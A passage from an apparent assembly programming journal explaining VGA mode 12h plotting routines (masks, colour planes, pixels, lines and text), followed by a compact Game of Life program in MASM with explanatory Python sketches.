              out   dx, al

Anyway, the plottingmask is defined to be as loaded in the AH register. We can
put any value in AH, not just one pixel, but also "no pixels" and "all
pixels".
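
The way a 16 bit OUT splits into two byte writes can be spelled out as
follows. This Python sketch only lists which byte would go to which port. It
does not touch any hardware, and the function names are made up.

```python
def out_word(port, ax):
    """A 16 bit OUT sends AL to `port` and AH to `port + 1`."""
    return [(port, ax & 0xFF), (port + 1, ax >> 8)]

def set_mask_writes(mask):
    """Port writes performed by SetMask for a given bit mask in AH."""
    ax = (mask << 8) | 8          # AH = mask, AL = 8 (Bit Mask register)
    return out_word(0x3CE, ax)

print([(hex(p), hex(v)) for p, v in set_mask_writes(0x10)])
```

So index 8 goes to port 03CE and the mask itself to port 03CF.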


Defining colour in Mode 012.
----------------------------
Colours to use during plotting are defined in a comparable fashion:

     --------------------- Set Colour --------------------- Start -------
     SetColr: push  dx               ; ah = colour
              mov   dx, 03C4
              mov   al, 2
              out   dx, ax           ; select Map Mask register, set planes
              pop   dx
              ret
     --------------------- Set Colour ---------------------- End --------

In Mode 013 you just can load a bytevalue colour into a memory location and
that's it. So that's an ultrafast mode, but at the price of resolution.

In Mode 012 we define colour with a series of I/O instructions. If a colour
got set, it remains active until canceled by another SetColr call. Try to
remember this when all of a sudden all kinds of fancy colours start to appear
on screen....


Where to put the pixel?
-----------------------
I have presented the formula some paragraphs before this one. Basically we
work with virtual coordinates and must translate these to real coordinates
before trying to calculate an address. This is done by:

     ------------------ VGA memory address ---------------- Start -------
     VGaddr:                         ; calculate address in VGA memory
              mov   es, [VGA_base]   ; quickly load segment register
              mov   ax, [di.CurrY]   ; ax = current Y
              add   ax, [di.Win_Y]   ; adjust for window offset
              call  [di.Multiply]    ; multiply by bytes per row
              mov   bx, [di.CurrX]   ; bx = current X
              add   bx, [di.Win_X]   ; adjust for window offset
              shr   bx, 3            ; divide by 8
              add   bx, ax           ; bx = index address into video segment
              ret
     ------------------ VGA memory address ----------------- End --------

It's all fairly straightforward.


How do we plot pixels in Mode 012?
----------------------------------
This is a silly process. We cannot access all the 4 colour planes at once, so
we have used SetColr to define which colourplanes are to be affected. This all
is rather complicated. You may either take my word for it, or consult a 1200
page reference....

Now that we're ready to plot pixels, we do so by the following code:

     ------------------ VgaPlot -------------------- Start --------------
     VgaPlot: mov   al, [es:bx]      ;  Do the actual plotting
              mov   al, [ToPlot]
              mov   [es:bx], al
              ret
     ------------------ VgaPlot --------------------- End ---------------

The first line is a read command. It notifies the VGA controller about the
address of the pixelbyte. The resulting data from the read is of no concern.
We immediately replace it with the value of "ToPlot". For plotting there is a
value of "FF" in this byte and for erasing there is a "00" in it.

After this comes the actual plotting function. The write to the specified
address sets the pixels as defined by AL and SetMask.

Adding it all up gives the following code to really plot a pixel:

     -------- PlotPix ------------------------------- Start -----------
     PlotPix: push  ax, bx, cx, es   ; plot a point on screen
              call  VGaddr
              mov   cx, [di.CurrX]   ; calculate plottingmask
              add   cx, [di.Win_X]
              and   cx, 0111xB       ; cl = position in byte
              mov   ah, 080
              shr   ah, cl           ; now move the high bit backwards...
              call  SetMask          ; use it to set mask
              call  VgaPlot          ; and do the plotting
              pop   es, cx, bx, ax
              ret
     -------- PlotPix -------------------------------- End ------------

That's it to plot a pixel: just a few calls to some procedures we defined
earlier on. The majority of this procedure is comprised of the way to find the
actual bit-position in the VGA memory byte. Remember, to plot pixel 0 we need
bit 7!
Therefore we load CX with the current X value, correct this for the current
window position and isolate the lower 3 bits. These indicate the position of
the pixel in screenmemory.

              mov   cx, [di.CurrX]   ; calculate plottingmask
              add   cx, [di.Win_X]
              and   cx, 0111xB       ; cl = position in byte

At this point, CL contains the n-th bit in this byte. So I load AH with the
binary pattern 10000000 and shift it right until the corresponding bit
position is reached:

              mov   ah, 080
              shr   ah, cl           ; now move the high bit backwards...

I don't know if there are batches of Intel CPU's that have a problem with the
SHR instruction if CL equals zero, but I have not yet noticed any.
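
The address and mask calculations of VGaddr and PlotPix can be followed with
a few numbers. This is a Python model of the arithmetic only, assuming 80
bytes per row as in Mode 012. The function names are hypothetical.

```python
BYTES_PER_ROW = 80               # 640 pixels / 8 pixels per byte

def vga_address(win_x, win_y, curr_x, curr_y):
    """Offset into the video segment, as VGaddr leaves it in BX."""
    x = win_x + curr_x           # window-relative -> screen coordinates
    y = win_y + curr_y
    return y * BYTES_PER_ROW + (x >> 3)

def plot_mask(win_x, curr_x):
    """Bit mask for one pixel: pixel 0 of a byte is bit 7."""
    return 0x80 >> ((win_x + curr_x) & 7)

# Pixel (3,0) of the full screen: byte 0, bit 4.
print(vga_address(0, 0, 3, 0), hex(plot_mask(0, 3)))
```

For the top-left pixel of PlotWin2 (window position 6,196) the same functions
give offset 15680 and mask 02.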


Lines: series of pixels.
------------------------
There are three kinds of lines: horizontal, vertical and sloped ones. Vertical
lines are plotted pixel by pixel since all of them end up in different bytes
of VGA memory. Sloped lines are best taken care of by a Bresenham-style line
drawing algorithm (although the digital differential analyser is better).

Horizontal lines are a different kind of line. In these, several adjacent
pixels are plotted. And adjacent pixels mainly are in the same VGA memory
byte. Therefore I made two horizontal line drawers. The one for short lines
(less than 17 pixels) just plots the pixels one by one.
The other algorithm, for lines of 17 pixels or more, tries to fill VGA memory
with as many byte writes as possible.


Taking care of longer horizontal lines.
---------------------------------------
Suppose our line is composed as follows:

     First       1       2      3 ... K    Last    ; byte in video memory
    ......## ######## ######## ###...### ###.....  ; # = pixel to be set

So our line starts at pixel 6 (i.e. bit 1) of VGA memory byte "First". Next it
lasts for N pixels and the last pixel to plot is pixel 2 (or bit 5).
We need some variables to calculate how to proceed with this in the shortest
possible time. This needs some calculations, so for short lines the math
overhead is more work than the actual plotting will take up.

     First       1       2      3 ... K    Last    ; byte in video memory
    ......## ######## ######## ###...### ###.....  ; # = pixel to be set

We first need to know the E-value which describes the number of pixels to plot
in the very first byte. The E-value is calculated as follows:

     E-val = 8 - ((CurrX + Win_X) AND 7)

Now we know the number of pixels to plot in the very first VGA memory
location. It would however come in handy if we would know with which plotting
mask this would correspond. That's why we use it to derive the E-mask:

    E-mask = FF shr ((8 - E-val) AND 7)

Next we need to know how many pixels there need to be plotted in the last
memory location. L-value and L-mask are determined as follows:

     L-val = (Total - E-val) AND 7
    L-mask = 080 sar (L-val - 1)         (L-mask = 0 if L-val = 0)

With the SAR we shift signbits to the right until the number of pixels
corresponds with the number of bits in the mask.

The last parameter we need to know is the actual speeding-up part: the full
bytes that can be plotted. The octet-part of the routine. We do this as
follows:

     K-val = (Total - E-val - L-val)/8

Now it also becomes clear why I kept the E-val and L-val parameters. They're
just needed for getting the right value for K-val.

There is, however one exceptional situation. Suppose the line we need to plot
is 26 pixels long, starting at pixel 6. This would produce the values:

   E-val = 2                                     E-mask = 00000011
   L-val = (26 - 2) AND 7 = 24 AND 7 = 0         L-mask = 00000000
   K-val = (26 - 2 - 0)/8 = 3

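So, if the line ends on a byte boundary, L-val is 0 and the L-mask must stay
empty. A count of 0 must never reach a plotting loop either: a LOOP that
starts with CX = 0 runs 65536 times and would plot <A LOT> of pixels past the
end of the line.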
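
The parameter math above can be checked with a short model. The sketch below
is in Python rather than assembler and is meant purely as a calculator;
hline_params is a made-up name, x stands for CurrX + Win_X, and the L-mask is
computed the way the H_Line source does it (empty when L-val is 0).

```python
def hline_params(x, total):
    """Return (E-val, E-mask, L-val, L-mask, K-val) for a horizontal line.

    x     -- absolute X of the first pixel (CurrX + Win_X)
    total -- line length in pixels; assumed to be at least E-val
    """
    e_val = 8 - (x & 7)                   # pixels in the leftmost byte
    e_mask = 0xFF >> ((8 - e_val) & 7)    # rightmost e_val bits set
    l_val = (total - e_val) & 7           # pixels in the rightmost byte
    l_mask = (0xFF00 >> l_val) & 0xFF     # leftmost l_val bits set, 0 if none
    k_val = (total - e_val - l_val) // 8  # full bytes in between
    return e_val, e_mask, l_val, l_mask, k_val

# The 26-pixel example from the text, starting at pixel 6:
print(hline_params(6, 26))
# A 29-pixel line from the same start leaves 3 pixels for the last byte:
print(hline_params(6, 29))
```

The first call reproduces the values listed in the text (E-val 2, L-val 0,
K-val 3); the second shows a case where the last byte is not empty.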

What the H_line procedure does is no more than what I described above. Here
comes the source:

     -------- H_Line -------------------------------- Start -----------
     L0:      mov   cx, [di.DeltaX]      ; do a short line
     L1:      call  PlotPix              ; by just repeating a single pixel-
              inc   [di.CurrX]           ; plot and update of CurrX
              loop  L1                   ; until done
              pop   es, cx, bx, ax
              ret

     H_Line:  push  ax, bx, cx, es       ; optimized horizontal line drawing
              cmp   [di.DeltaX], 17      ; too few pixels for a bulk draw?
              jb    L0
              mov   cx, [di.CurrX]       ; do a long line
              add   cx, [di.Win_X]       ; first get the E-value as described
              and   cx, 0111xB           ;   above
              mov   bx, 8
              sub   bx, cx
              mov   [E_val], bx          ; pixels to plot in leftmost byte
              mov   al, 0FF              ; now compose the mask to use there
              shr   al, cl
              mov   [E_mask], al         ; and store it in memory
              mov   cx, [di.DeltaX]      ; CX = length of line
              sub   cx, [E_val]          ; compensate for first-byte pixels
              mov   ax, cx
              and   ax, 0111xB           ; this many pixels in rightmost byte
              mov   [L_val], ax          ; and store it in memory
              sub   cx, ax               ; CX = number of pixels in between
              shr   cx, 3                ; divide by 8 pixels per byte
              mov   [K_val], cx          ; number of "full" bytes to plot
              clr   al                   ; AL := 0
              mov   cx, [L_val]          ; prepare to compose L-mask
              cmp   cx, 0                ; any bits in "last byte"
              IF ne mov  al, bit 7       ; if any bits, set up AL register
              dec   cx                   ; compensate for pixel 0, ...
              sar   al, cl               ; ... compose plotting mask and ...
              mov   [L_mask], al         ; ... store it into memory.
                                         ; that's it. Let's plot!
              call  VGaddr               ; load BX with address of byte in
                                         ; VGA memory
              mov   ah, [E_mask]
              call  SetMask              ; set plotting mask and ...
              call  VgaPlot              ; ... plot leftmost part
              inc   bx                   ; get adjacent address
              mov   cx, [K_val]          ; prepare for bulk-filling
              jcxz  >L4                  ; if nothing to do, jump out
              mov   ah, 0FF              ; else set ALL PIXELS mask
              call  SetMask
     L3:      call  VgaPlot              ; plot middle part
              inc   bx
              loop  L3                   ; until done
     L4:      mov   ah, [L_mask]
              call  SetMask
              call  VgaPlot              ; plot remaining pixels
              mov   ax, [di.DeltaX]
              add   [di.CurrX], ax       ; make sure CurrX is updated
              pop   es, cx, bx, ax       ; and git outa'here
              ret
     -------- H_Line --------------------------------- End ------------

The preparations are the bulk of the work, but after that is done, the line is
plotted with the lowest amount of I/O overhead.
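
As a cross-check of the three-stage approach (leftmost part, bulk fill,
rightmost part), here is a rough Python model that fills one scan line both
ways and lets you compare the results. The function names and the plain
bytearray standing in for VGA memory are assumptions made for this sketch;
pixel 0 of a byte is taken to be bit 7, as in the diagram above.

```python
def plot_hline_bytes(x, total, width_bytes=80):
    """Set pixels x .. x+total-1 in one scan line using E/K/L byte writes."""
    row = bytearray(width_bytes)
    e_val = 8 - (x & 7)
    l_val = (total - e_val) & 7
    k_val = (total - e_val - l_val) // 8
    addr = x >> 3                         # byte holding the first pixel
    row[addr] |= 0xFF >> (x & 7)          # leftmost part (E-mask)
    addr += 1
    for _ in range(k_val):                # bulk fill, 8 pixels per write
        row[addr] = 0xFF
        addr += 1
    if l_val:                             # rightmost part (L-mask)
        row[addr] |= (0xFF00 >> l_val) & 0xFF
    return row

def plot_hline_pixels(x, total, width_bytes=80):
    """Reference version: one pixel at a time, like the short-line path."""
    row = bytearray(width_bytes)
    for px in range(x, x + total):
        row[px >> 3] |= 0x80 >> (px & 7)
    return row

# Both routes should light exactly the same pixels:
print(plot_hline_bytes(6, 26) == plot_hline_pixels(6, 26))
```

The byte-wise version touches 1 + K-val + 1 bytes at most, against one access
per pixel for the reference version, which is where the speed-up comes from.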


Vertical lines.
---------------
Vertical lines are simply plotted by repeatedly calling PlotPix. It's so simple
that I neither need nor want to elaborate on it:

     -------- VertLin ------------------------------- Start -----------
     VertLin: push  cx                   ; draw a vertical line
              mov   cx, [di.DeltaY]
     L0:      call  PlotPix
              inc   [di.CurrY]           ; adjust Y coordinate
              loop  L0                   ; but not X value!
              pop   cx
              ret
     -------- VertLin -------------------------------- End ------------


What to do with linedrawing functions?
--------------------------------------
Now that we can draw lines, we can also draw boxes and window borders. This
all looks very professional and the overview of a program is enhanced
considerably. Try to figure out how to make the box-drawers by yourself.


Plotting text.
--------------
Now that we have windows that can be put at any plotting position, we also
need to be able to position text at any position. It doesn't look nice if
different windows force text to default to byte boundaries. And with the
experience we got from the H_line function, we are able to make a character
plotter that puts text on screen at ANY position.

I use a 9 x 16 character set. The ninth pixel column is just always blank, but
it enhances readability considerably. The glyphs in the bitmap are all 8 pixels
wide and 16 pixels tall.

In exceptional cases, the bitmaps can be plotted at byte boundaries. In 85+ %
of the time (7 out of 8 possible pixel offsets) this will not be the case.
Therefore I do the following:

  - do some positioning math first
  - repeat 16 times:
    - load the byte of the bitmap in AH
    - shift AX to the right the correct number of pixels
    - plot the AH part
  - if plotting on a byte boundary, we're done, else
    - repeat 16 times:
      - load the byte of the bitmap in AH
      - shift AX to the right the correct number of pixels
      - plot the AL part

Let's just have a look:

     -------- PutChar ------------------------------- Start -----------
     L0:      add   [di.CurrY], 16       ; process 'LF'
     L1:      pop   es, si, cx, bx
              ret

     L2:      mov   bx, [di.Indent]      ; process 'CR'
              mov   [di.CurrX], bx
              jmp   L1

     PutChar: push  bx, cx, si, es       ; print char in al at (x,y)
              cmp   al, lf
              je    L0
              cmp   al, cr
              je    L2

              mov   bx, [di.CurrX]
              add   bx, CHR_WID
              cmp   bx, [di.Win_wid]     ; still safe to print character?
              jbe   >L3                  ; if so, skip over this part
              mov   bx, [di.Indent]
              mov   [di.CurrX], bx       ; mimic 'CR'
              add   [di.CurrY], 16       ; mimic 'LF'

     L3:      mov   cx, [di.CurrX]
              add   cx, [di.Win_X]
              and   cx, 0111xB
              mov   [C_val], cl          ; store shiftcount for masks
              mov   bx, 0FF00
              shr   bx, cl               ; setup plotting mask and ...
              mov   [P_mask], bx         ;     ... store it
              clr   ah                   ; ax = ASCII code
              mov   si, ax               ; make address of pixels in bitmap
              shl   si, 4
              add   si, offset bitmap
              call  VGaddr               ; bx = -> in video memory
              mov   ax, [P_mask]         ; only the AH part is used ...
              call  SetMask              ; ... here.
              mov   cx, 16               ; 16 pixel lines per token
     L4:      push  cx                   ; we're in the loop now
              mov   ah, [si]             ; AH = pixelpattern
              clr   al                   ; AL = empty
              mov   cl, [C_val]          ; get shiftcount
              shr   ax, cl               ; distribute pixelBYTE across a WORD
              mov   cl, [es:bx]          ; dummy read, CL is expendable
              mov   [es:bx], ah          ; actual plotting of this half
              add   bx, 80               ; point to next pixelbyte address
              inc   si                   ; next pixeldata address
              pop   cx
              loop  L4                   ; and loop back

              sub   bx, 16 * 80 - 1      ; top row again, one byte to the right
              mov   ax, [P_mask]
              cmp   al, 0                ; if nothing to do, ...
              je    >L6                  ; ... skip this chapter
              mov   ah, al               ; else repeat the lot for the right-
              call  SetMask              ; most pixels....
              mov   cx, 16
              sub   si, cx               ; correct SI
     L5:      push  cx
              mov   ah, [si]
              clr   al
              mov   cl, [C_val]
              shr   ax, cl
              mov   cl, [es:bx]
              mov   [es:bx], al
              add   bx, 80
              inc   si
              pop   cx
              loop  L5
     L6:      add   [di.CurrX], CHR_WID  ; adjust CurrX value before ...
              jmp   L1                   ; ... getting a hike
     -------- PutChar -------------------------------- End ------------
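
The heart of PutChar is the SHR AX, CL that spreads one bitmap byte over two
adjacent video bytes. The following Python sketch models just that step and
the matching plotting masks; split_glyph_row and plot_masks are names invented
here, and shift plays the role of C_val.

```python
def split_glyph_row(pattern, shift):
    """Split one 8-pixel glyph row across two adjacent video bytes.

    pattern -- the bitmap byte (AH before the shift, AL cleared)
    shift   -- (CurrX + Win_X) AND 7, the value kept in C_val
    Returns (left_byte, right_byte), i.e. AH and AL after SHR AX, CL.
    """
    ax = (pattern << 8) >> shift
    return ax >> 8, ax & 0xFF

def plot_masks(shift):
    """Return the two halves of P_mask (0FF00h shifted right by C_val)."""
    p_mask = 0xFF00 >> shift
    return p_mask >> 8, p_mask & 0xFF

for shift in (0, 3):
    print(shift, [hex(v) for v in split_glyph_row(0xFF, shift)],
          [hex(v) for v in plot_masks(shift)])
```

With a shift of 0 the right-hand mask is 0, which is the case the routine
detects with "cmp al, 0" to skip the second pass.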

So much for plotting text. This routine will dump any character at any place
on the graphics screen. But it needs a CurrX and a CurrY value to know where
to plot things. This is both an advantage and a disadvantage. The advantage is
that we can plot ANYWHERE we like. The disadvantage is that we need to
elaborately specify CurrX and CurrY before the text is where we would like to
have it.

That's why I made the construct with the Topic and TopicEnd macros, as
described above.

Here comes the code for printing a table on screen. We spent a lot of time on
the preparations, and this is the stage where it is going to pay off. Look how
much code we need for printing neat sets of tokens and characters on screen.

     -------- Print --------------------------------- Start -----------
     print:   mov   ah, [di.TxtCol]      ; print a table of text
              call  SetColr
     L0:      lodsw                      ; get Xpos
              cmp   ax, 0F000            ; end of table?
              je    ret                  ; exit, if so
              mov   [di.CurrX], ax
              lodsw                      ; get Ypos
              mov   [di.CurrY], ax
     L1:      lodsb                      ; get text
              cmp   al, 0
              je    L0
              call  putchar              ; and print it
              jmp   L1                   ; until this line is done
     -------- Print ---------------------------------- End ------------
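
The table format that the print routine walks can be read off the code: a word
for X, a word for Y, the text, a zero byte, and finally a word 0F000h to end
the table. A small Python model of that layout follows. build_table is only a
hypothetical stand-in for what the Topic and TopicEnd macros emit, and
walk_table mirrors the lodsw/lodsb sequence.

```python
import struct

END_OF_TABLE = 0xF000  # the terminator word tested by 'print'

def build_table(entries):
    """Pack (x, y, text) entries: word X, word Y, text bytes, zero byte."""
    out = bytearray()
    for x, y, text in entries:
        out += struct.pack("<HH", x, y) + text.encode("ascii") + b"\0"
    out += struct.pack("<H", END_OF_TABLE)
    return bytes(out)

def walk_table(table):
    """Decode a table the way 'print' does; returns a list of (x, y, text)."""
    pos, entries = 0, []
    while True:
        (x,) = struct.unpack_from("<H", table, pos)   # lodsw: Xpos
        pos += 2
        if x == END_OF_TABLE:
            return entries
        (y,) = struct.unpack_from("<H", table, pos)   # lodsw: Ypos
        pos += 2
        end = table.index(0, pos)                     # lodsb until 0
        entries.append((x, y, table[pos:end].decode("ascii")))
        pos = end + 1

table = build_table([(10, 20, "Hello"), (10, 36, "World")])
print(walk_table(table))
```

Note that an X position of 0F000h can never be used for text, since that value
doubles as the end marker.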

With this approach, and starting from a working (empty) framework of routines,
you can design the user interface of your software within the hour. And it will
look just fine.
The actual code is then the only thing you need to worry about.....

Having such routines, which have been tested and found reliable, you make the
user interface easily and are able to concentrate on the actual coding for the
maximum amount of time. If the screen needs another layout (since you couldn't
realize the function you had in mind), just change a few entries in the table.
Many times just the X or Y values need some adjustment for better lining up,
or for regrouping. No need to worry about the order of the plotting. Just make
sure that the correct window is selected (for the colours) and that the table
is terminated by a TopicEnd.


Conclusion.
-----------
So much for my elaboration on VGA mode 12h. Again, I would rather use
800 x 600, but that mode is not standardised. VGA 12h is standard on all VGA
cards, so it's the best we can universally get, and for many applications it
is more than enough.

Please try to make the BoxDrawing function. I will submit the "solution" to
the next issue. For future issues I will start working on an explanation about
mouse-usage. This little rodent is nice for controlling many applications. If
the screen is well laid out, you don't need the keyboard for data entry. Just
drag the mouse along the screen and poke him in the eye.


The bitmap data for the character generator can be obtained from
           http://asmjournal.freeservers.com/supplements/univ-vmode.html
where the complete text of the article has been archived.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                     Conway's Game of Life
                                                     by Laura Fairhead


     I had the idea for this one day after stumbling upon a "gem" that
somebody had written to play life. It was small and fast and reminded
me of years ago when I had written many versions of this for the
BBC Master 128 (my love lost). Since I had never written a version
for the PC I thought that I would, and ended up spending some hours
trimming off the bytes until it is now :- 156 bytes long. I must admit
if it was not for the program that I found, this program would have been
MUCH slower than it is. After I had written the code I tested it against
the program that I had found and to my perplexity it was a great deal
slower. After some hours of frustration I found the reason:- my program
was accessing the video memory to do the bulk of its work. This must have
brought about a factor of 12 decrease in speed!!

     Life is a classic cellular automaton by John Conway. It is
played on an nxn grid of squares. Each square may be occupied by a
cell or empty. Each 'go' of the game the player calculates the next
generation of a colony of cells by applying three simple rules:-

(i)     a cell with fewer than 2 or more than 3 neighbours dies
(ii)    a cell with 2 or 3 neighbours survives
(iii)   a cell is born in an empty square with exactly 3 neighbours

     A neighbouring square is one diagonally adjacent as well as the
normal horizontal/vertical so each square has 8 neighbouring squares.


Overview of the code
~~~~~~~~~~~~~~~~~~~~

First, note that if we define

         S:=state of square in this generation (0=empty, 1=occupied)
         N:=number of neighbours
        S':=state of square in the next generation

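then according to the rules

         S'={1, if (N=2 or N=3) and S=1
            {1, if N=3 and S=0
            {0, otherwise

so S'=1 iff (N=2 and S=1) or N=3

this can be simplified using bitwise-OR to the dramatically simple:

             S'= ( (N|S)=3 )

This works because N|S=3 only for N=3 (with either S) or for N=2 with S=1;
every other N from 0 to 8 leaves N|S different from 3.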
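
     The shortcut is easy to verify by brute force, since there are
only 9 x 2 combinations of N and S. The Python sketch below (function
names are mine, not part of the program) compares the rules as written
with the bitwise-OR form:

```python
def next_state_rules(n, s):
    """Next state straight from the three rules."""
    if s == 1:
        return 1 if n in (2, 3) else 0    # rules (i) and (ii)
    return 1 if n == 3 else 0             # rule (iii)

def next_state_or(n, s):
    """Next state from the bitwise-OR shortcut S' = ((N | S) = 3)."""
    return 1 if (n | s) == 3 else 0

for n in range(9):                        # a square has 0..8 neighbours
    for s in (0, 1):
        assert next_state_rules(n, s) == next_state_or(n, s)
print("shortcut agrees with the rules for all 18 cases")
```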

note: iff means "if and only if"

       "A iff B" means that A => B and B => A


     The code uses one big array with one byte for each square that
starts just after the program end. To save space it just assumes that it
can use this memory since this is generally okay. However this is
very bad practice really and it should use AH=04Ah/int 021h to adjust
the memory size and abort if not successful.

     The big array actually serves the purpose of 2 arrays; bit0 of
a byte indicates the state of the square in the current generation. bit4
of each byte indicates the state of the square in the next generation.

     After initialisation, generation 0 is calculated by filling about
1/4 of the array with 1's.
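
     The 1/4 comes from the way the listing turns a pseudo-random AL
into a cell: CMP AL,0C0h / SBB AL,AL / INC AX. A quick Python model of
those three instructions (cell_from_al is a name made up for this
sketch) counts how many of the 256 possible AL values give a 1:

```python
def cell_from_al(al):
    """Emulate CMP AL,0C0h / SBB AL,AL / INC AX for one pseudo-random AL."""
    carry = 1 if al < 0xC0 else 0         # CMP sets CF when AL < 0C0h
    al = (0 - carry) & 0xFF               # SBB AL,AL gives 0FFh or 00h
    return (al + 1) & 0xFF                # INC AX: low byte becomes 0 or 1

occupied = sum(cell_from_al(al) for al in range(256))
print(occupied, "of 256 values give an occupied cell")
```

     Only AL values 0C0h to 0FFh produce a cell, which is 64 out of
256. How evenly the generator actually spreads AL is a separate matter
that this sketch does not look at.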

     Now we do a loop to get the next generation. The screen is 0140h
bytes across and 0C8h bytes down, and the array uses the same layout.
Therefore the eight neighbours of a square lie at these offsets from it:-

     -0141h -0140h -013Fh

     -0001h    .   +0001h

     +013Fh +0140h +0141h

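     If DI is the offset in the array of the square we are calculating
for, note that the neighbours can be summed as follows (each of the two
word-sized accesses picks up two adjacent neighbours, one in AL and one
in AH):-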

     MOV AX,[DI-0141h]
     ADD AL,[DI-013Fh]
     ADD AX,[DI+013Fh]
     ADD AL,[DI+0141h]
     ADD AL,[DI-1]
     ADD AL,[DI+1]
     ADD AL,AH

     Note that if bit4 of any of the neighbours was set then we would
still have the correct total in the least significant 4 bits of AL.
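
     To see that the seven instructions really deliver the neighbour
count in the low nibble, even with bit4 set everywhere, here is a small
Python emulation. It is only a sketch: neighbour_sum is an invented
name and a bytearray stands in for the array segment.

```python
def neighbour_sum(cells, di):
    """Emulate the seven-instruction sum; returns AL afterwards."""
    def byte(off):
        return cells[di + off]

    def word(off):                        # little-endian 16-bit load
        return cells[di + off] | (cells[di + off + 1] << 8)

    ax = word(-0x141)                     # MOV AX,[DI-0141h]
    al, ah = ax & 0xFF, ax >> 8
    al = (al + byte(-0x13F)) & 0xFF       # ADD AL,[DI-013Fh]
    ax = (((ah << 8) | al) + word(0x13F)) & 0xFFFF   # ADD AX,[DI+013Fh]
    al, ah = ax & 0xFF, ax >> 8
    al = (al + byte(0x141)) & 0xFF        # ADD AL,[DI+0141h]
    al = (al + byte(-1)) & 0xFF           # ADD AL,[DI-1]
    al = (al + byte(1)) & 0xFF            # ADD AL,[DI+1]
    al = (al + ah) & 0xFF                 # ADD AL,AH
    return al

cells = bytearray(0x400)
di = 0x200
for off in (-0x141, -0x140, -0x13F, -1, 1, 0x13F, 0x140, 0x141):
    cells[di + off] = 0x11                # alive now and alive next time
print(hex(neighbour_sum(cells, di)), neighbour_sum(cells, di) & 0x0F)
```

     With all eight neighbours at 011h the sum is 088h: the bit4
contributions pile up in the high nibble and the low nibble still
reads 8.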

     So from here the new cell state can be calculated simply:-

     OR AL,[DI]
     AND AL,0Fh

     CMP AL,3

     And if ZF=1 now we have a set cell.

     JNZ ko
     OR BYTE PTR [DI],010h
ko:


     When the next generation has been calculated we have done most of
the work. If we want to iterate, all of those bit4's must be moved to
bit0. We also want to display the next generation, and this can easily
be done at the same time.
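
     The listing does this four cells at a time with SHR EAX,4 and
AND EAX,01010101h. As an illustration only (fixup_dword is a name
invented here), the same operation in Python on four packed array
bytes:

```python
def fixup_dword(eax):
    """Emulate SHR EAX,4 / AND EAX,01010101h on four packed cells."""
    return (eax >> 4) & 0x01010101

cells = bytes([0x10, 0x01, 0x11, 0x00])   # four array bytes
eax = int.from_bytes(cells, "little")     # what LODSD would load
fixed = fixup_dword(eax).to_bytes(4, "little")
print(list(fixed))
```

     The shift drags each byte's low nibble into the byte below it,
but the AND mask throws those bits away again, so only the old bit4
survives as the new bit0.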

     Note that due to the structure of the code generation#0 is never
displayed. Also we always have blue cells. Despite this it is quite
an entertaining little program to watch....


     The source here is in MASM format but should be trivial to convert
to run on any assembler. It is assembled into a .COM file which means
you should use the /T option on the linker (T=tiny).


===========START OF CODE===================================================

OPTION SEGMENT:USE16
.386

cseg SEGMENT BYTE

ASSUME NOTHING
ORG 0100h

kode PROC NEAR

;
;mode 013h=320x200x256 (0140hx0C8h) and be kind with the stack
;
         MOV SP,0100h

         MOV AX,013h
         INT 010h

;
;use current time as random number seed
;in BP,DX which is used later
;
         MOV AH,02Ch
         INT 021h
         MOV BP,CX
;
;get seg address of 1st seg after code for array store start
;for now ES points there and DS=screen
;
         MOV AX,DS
         ADD AX,01Ah             ;(OFFSET endofprog+0Fh>>4)=(1A)
         MOV ES,AX
         MOV AX,0A000h
         MOV DS,AX

;
;CREATE GENERATION#0
;  this is done by filling approx 1/4 of the cells in the array
;  'randomly', while taking care not to fill any edge cells
;

;
;blank the array
;  this is done to ensure the edge cells are clear
;
         XOR DI,DI
         MOV CX,0FA00h
         REP STOSB

;
;fill the array
;  two nested loops, CL counts the rows, SI counts the columns
;  this is so that after each row DI can be bumped past the edge
;
         MOV CL,0C6h
         MOV DI,0141h            ;array offset we are addressing
;
;BX is 0141h from now until exit, it is used as a constant later
;
         MOV BX,DI

lopr0:  MOV SI,-013Eh

;
;iterate random number seed in BP,DX
;
lopr:   LEA AX,[BP+DI]
         ROR BP,3
         XOR BP,DX
         SUB DX,AX
;
;set cell with probability 1/4
;
         CMP AL,0C0h
         SBB AL,AL
         INC AX
         STOSB
;
;
         INC SI
         JNZ lopr

         SCASW                   ;DI+=2, skipping edge

         LOOP lopr0

;
;now we set DS=array, ES=screen. this doesn't change until exit
;
         PUSH ES
         PUSH DS
         POP ES
         POP DS                  ;DS=vseg,ES=0A000h throughout

;
;'mlop' is the main loop, outputting generations until the user terminates
;
mlop:
;
;CREATE NEXT GENERATION
;
         MOV DI,BX               ;DI=0141h

;
;'lopy' is the loop for rows, a count is not needed because we can get
;the stop point from testing the array offset DI
;

lopy:   MOV SI,013Eh

;
;'lopx' is the loop for columns, SI holds the count
;

;
;get the total number of neighbours into the least significant 4 bits of AL
;
lopx:   MOV AX,[DI-0141h]
         ADD AL,[DI-013Fh]
         ADD AX,[DI+BX-2]
         ADD AL,[DI+BX]
         ADD AL,[DI-1]
         ADD AL,[DI+1]
         ADD AL,AH
;
;calculate new cell state
;
         OR AL,[DI]
         AND AL,0Fh
         CMP AL,3
         JNZ SHORT ko
         OR BYTE PTR [DI],010h

ko:     INC DI

         DEC SI
         JNZ lopx

;
;(each row we miss 2 edge cells)
;
         SCASW
         CMP DI,0FA00h-013Fh
         JC lopy

;
;FIXUP ARRAY AND DISPLAY
; bit4 is copied to bit0 in each byte. all other bits then cleared so
; cells appear as blue pixels, also the iteration loop above assumes
; that bit4 is clear on entry (it only sets it)
;
         MOV CX,03E80h
         XOR DI,DI

lopc:   LODSD
         SHR EAX,4
         AND EAX,01010101h
         MOV [SI-4],EAX
         STOSD
         LOOP lopc

;
;USER KEYPRESS?
;
         MOV AH,0Bh
         INT 021h
         ADD AL,3
;
;no, back for next generation
;
         JP mlop
;
;yes, AL=2 now so make AX=2 to go into text mode
;
         CBW
         INT 010h
;
;back to DOS
;
         MOV AH,04Ch
         INT 021h

kode ENDP

endofprog EQU $

cseg ENDS

END FAR PTR kode


===========END OF CODE=====================================================
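
     The keypress test at the end of the main loop leans on the parity
flag. INT 021h with AH=0Bh returns AL=00h when no key is waiting and
AL=0FFh when one is; after ADD AL,3 that becomes 3 or 2, and JP jumps
only when the result has an even number of set bits. A Python sketch
of the flag logic (parity_flag is a made-up helper):

```python
def parity_flag(value):
    """PF as the x86 sets it: 1 when the low byte has an even number of 1 bits."""
    return 1 if bin(value & 0xFF).count("1") % 2 == 0 else 0

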